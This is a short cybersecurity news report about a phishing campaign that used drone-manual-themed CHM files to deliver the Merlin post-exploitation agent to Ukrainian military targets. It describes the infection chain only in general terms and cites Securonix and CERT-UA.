Explore the cybersecurity threat as a phishing campaign employs Merlin Malware via drone manuals to target the Ukrainian military. Stay informed about emerging security risks
Ukrainian military groups have been targeted by a phishing campaign that uses drone manuals as bait to distribute Merlin, a Go-based open-source post-exploitation toolset.
“Since drones or Unmanned Aerial Vehicles (UAVs) have been an integral tool used by the Ukrainian military, malware-laced lure files themed as UAVs service manuals have begun to surface,” Securonix researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov reported to The Hacker News.
The effort is being tracked by the cybersecurity firm STARK#VORTEX.
The attack begins with a Microsoft Compiled HTML Help (CHM) file that, when opened, executes malicious JavaScript embedded inside one of the HTML pages to execute PowerShell code meant to contact a remote server and get an obfuscated binary.
The payload is decoded to extract the Merlin Agent, which is then configured to communicate with a command-and-control (C2) server for post-exploitation actions, thereby capturing control of the host.
“While the attack chain is quite simple, the attackers leveraged some pretty complex TTPs and obfuscation methods in order to evade detection,” according to the investigators.
This is the first time Merlin has been used to target Ukrainian government organisations. The Computer Emergency Response Team of Ukraine (CERT-UA) discovered a similar attack chain in early August 2023 that uses CHM files as decoys to infect machines with the open-source application.
The breaches were linked to a threat actor known as UAC-0154, which CERT-UA monitors.
“Files and documents used in the attack chain are very capable of bypassing defences,” claimed the researchers.
“It would be unusual to receive a Microsoft help file over the internet.” The attackers, on the other hand, framed the lure documents to look like something an unsuspecting target may expect to see in a help-themed document or file.”
The news comes only weeks after the CERT-UA reported an unsuccessful cyber attack by the Russian state-sponsored team known as APT28 against an undisclosed vital energy infrastructure facility in the country.
Read Also